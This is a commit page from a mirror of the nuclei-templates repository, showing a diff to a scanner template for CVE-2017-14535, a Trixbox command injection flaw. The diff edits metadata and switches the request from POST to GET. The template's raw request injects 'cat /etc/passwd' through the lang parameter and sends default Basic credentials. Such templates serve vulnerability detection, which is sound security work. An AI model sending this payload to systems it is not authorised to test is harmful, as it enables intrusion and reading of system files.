daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Misc changes

patch-1
sandeep 2021-06-01 11:06:13 +05:30
parent b0eca52c4b
commit b021a0cf49
1 changed files with 7 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
cves/2017/CVE-2017-14535.yaml
View File

@ -1,24 +1,24 @@
id: CVE-2017-14535
info:
name: Trixbox 2.8.0.4 Remote Code Execution
name: Trixbox - 2.8.0.4 OS Command Injection Vulnerability
author: pikpikcu
severity: high
reference: https://www.exploit-db.com/exploits/49913
tags: trixbox,rce
reference: |
- https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/
- https://www.exploit-db.com/exploits/49913
tags: cve,cve2017,trixbox,rce
requests:
- raw:
- |
POST /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1
GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1
Host: {{Hostname}}
User-Agent: User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Cache-Control: max-age=0
matchers-condition: and
matchers: